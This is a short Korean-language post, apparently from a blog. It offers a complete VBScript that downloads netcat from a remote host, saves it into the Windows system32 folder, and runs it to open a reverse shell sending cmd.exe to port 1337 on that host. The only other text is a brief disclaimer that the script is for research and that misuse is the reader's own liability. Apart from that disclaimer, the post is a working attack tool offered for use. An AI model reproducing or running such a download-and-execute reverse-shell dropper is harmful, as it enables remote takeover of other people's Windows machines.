netcat 을 다운로드 후 실행시키는 VBScript (Reverse Shell)

※ 주의사항 : 
악용하지 마세요!!!
해당 글은 연구 목적으로 기재하였습니다.
악의적인 목적으로 이용할 시 발생할 수 있는 법적 책임은 자신에게 있습니다.



' 설정 지정 (URL 은 다운로드 주소임)
strFileURL = "hxxp://192.168.100.129/nc.exe"
strHDLocation = "C:\WINDOWS\system32\nc.exe"

' 파일 가져오기
Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")

objXMLHTTP.open "GET", strFileURL, false
objXMLHTTP.send()

If objXMLHTTP.Status = 200 Then
    Set objADOStream = CreateObject("ADODB.Stream")
    objADOStream.Open
    ' adTypeBinary
    objADOStream.Type = 1

    objADOStream.Write objXMLHTTP.ResponseBody
    ' 스트림 위치를 시작 위치로 설정
    objADOStream.Position = 0

    Set objFSO = Createobject("Scripting.FileSystemObject")
        If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
            Set objFSO = Nothing

            objADOStream.SaveToFile strHDLocation
            objADOStream.Close
            Set objADOStream = Nothing
    End if

    Set objXMLHTTP = Nothing

Set objShell = CreateObject("WScript.Shell")

' 연결 실행
objShell.Exec("nc -d 192.168.100.129 1337 -e cmd.exe")